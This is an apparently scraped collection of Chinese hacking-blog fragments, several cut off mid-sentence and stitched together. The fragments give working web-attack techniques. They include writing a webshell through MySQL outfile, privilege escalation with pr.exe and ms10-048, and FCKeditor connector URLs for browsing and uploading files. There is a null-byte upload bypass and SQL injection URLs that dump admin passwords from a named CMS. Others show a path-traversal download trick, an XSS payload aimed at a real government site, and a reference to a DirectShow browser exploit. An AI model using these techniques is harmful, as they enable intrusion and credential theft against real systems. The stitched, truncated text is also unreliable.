里面别人嵌入了一句话，没成功，我通过网页删除了，但是备份得到数据库，始终那个报错的一句话（没成功）在，弄得我没法写unicode的一句话（具体参照我以前的blog），结果下载本地研究了一下，发现acess就算删除了，内容还在的，所以一般数据库大小都不会变（就算你删除了一条数据),怪不得。后来想到，access数据库不是有个压缩功能，估计就是用来真正清除那些不用的空间（已经删除的条目）。但是有个问题，这种通过备份、恢复得到马的网页，都没有压缩功能，那么没办法。。。。。。

一般apache的php配置一下，就会将单引号转义，具体参见文章：http://hi.baidu.com/it_security/blog/item/fad5f6814db5c8db9023d922.html

不过现在也可以突破限制了，得到一句话木马php文件/php小马：

 

mysql多语句执行下不用单引号outfile写shell

mysql> use xssdb;
Database changed

mysql> set @a=0x73656C65637420307833433346373036383730323034303635373

  今天碰到一个使用pr.exe跟ms10-048提权，提示是成功了，但是就是没发现增加账号，

后来估计是net命令有问题，自己上传一个吧，再执行ms10048的本地提权，ok。

 

    这两天碰到好几个fck的editor，结果都没有browser.html或test.html,这儿直接给出几个操作url地址：

http://www.xxx.com//fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=&Type=File&CurrentFolder=/

直接浏览文件

Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

     上传文件一般是upload.asp,upfile.asp，一般可以定义文件路径，也就是uppath，而一般程序会判定后缀的，比如限定不能等于asp,aspx,asa，那么可以传cdx、cer或php(服务器支持)，或者判定只能是.jpg,.gif，那么就必须使用截断方式来处理了，这儿详细说明一下。

具体过程细节为：

1.正常提交图片上传（最好是简单的一句话木马）

2.抓包，将刚才的包抓下来，拷贝post数据出来，存成txt

3.编辑包，用十进制工具编辑，增加00。

4.重新提交包，nc(netcat)最原始了，也最

   老东西了,就当收集整理下,碰到了自己用用（v2.4 v2.3都适用）.

1.特征:

a)boss目录;

b)newsinfo.asp与yeNewsInfo.asp,

c)uploada.asp,upfilea.asp

d)Database\DataShop.mdb数据库

2.漏洞:

   注入漏洞,直接管理员帐号密码:

yeNewsInfo.asp?id=0%20union%20select%201,username,3,4,password%20from%20Bs_User

NewsInfo.asp?id=0%20union%20select%201,username,3,4,password%20from%20Bs_User,

不过有时候是没法直接爆出得,但

今天碰到个沸腾展望多媒体新闻系统，很老的东西了，漏洞很多，不过发现对方都修复了，最后找到一个任务文件下载的down.asp:

方法：构造http://www.xxx.cn/down.asp?filename=../down.asp%20

其中后面的%20表示空格，用来跳过验证的，另外记得用支持手动设定refer的浏览器，如firefox+插件。

代码如下：

<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<%
F

1.版本:应该是 4.0 sp7以下的吧(应该算不上0day漏洞了).(网上资料说的,5.0版本的我没测试),我主要用图片详细解释漏洞利用过程.

2.过程:

   a)看版本,访问网站跟admin目录,看登陆的logo (foosuncms),提示版本.

    b)注册, 访问/User/Reg_service.asp,记录这个id,如下图:

   

  

首先感谢80sec的兄弟，共享了漏洞，经测试，多个大站存在使用这种服务器的情况（经测试包括中国排名前3的门户网站）。

刚好在分析的过程中，发现可恶的360safe在偷偷收集我们的上网网址，而这个服务器就是

nginx/0.6.35

[Ie0day]Microsoft DirectShow MPEG2TuneRequest Stack Overflow Exploit

漏洞名: BDATuner.MPEG2TuneRequest Stack Overflow Exploit
CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF
软件: Microsoft DirectShow(msvidctl.dll)
版本: Possible all avaliable versions

不信自己测试：

http://www.huibian.com/test/logo1.htm

如果探出来计算机，那就表示有漏洞！

不过这样的demo

http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=<script>alert("http://hi.baidu.com/it_security")</script>

包括猜解数据库库名、表名、字段名、字段内容（表内容）、表条数，以及测试相关的权限。

接上文，太长了，一贴放不下：

GET

下面日志使用了我自己开发的工具[见blog前一贴]记录下来的（日志可是业内顶尖商业软件扫描出来的sql注入语句）。

包括猜解数据库库名、表名、字段名、字段内容（表内容）、表条数，以及测试相关的权限。

（mssql/mysql)

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET

主要用途：
分析网站扫描工具的方法，如注入、跨展、cookie伪造等。另外，就是跳过NTLM认证。
还有就是网站url地址过滤。
下面是主要特性说明：

1.记录URL地址：可以分析sql注入工具的探测语句，便于sql注入学习与手动注入
2.支持NTLM认证：目前绝大部分sql等网站扫描工具不支持域认证方式。
3.支持url地址过滤： 目前绝大部分sql等网站扫描工具(含业界顶尖的appScan/webinspect等）
                都无法过滤

web dav iis6扫描器改进不少：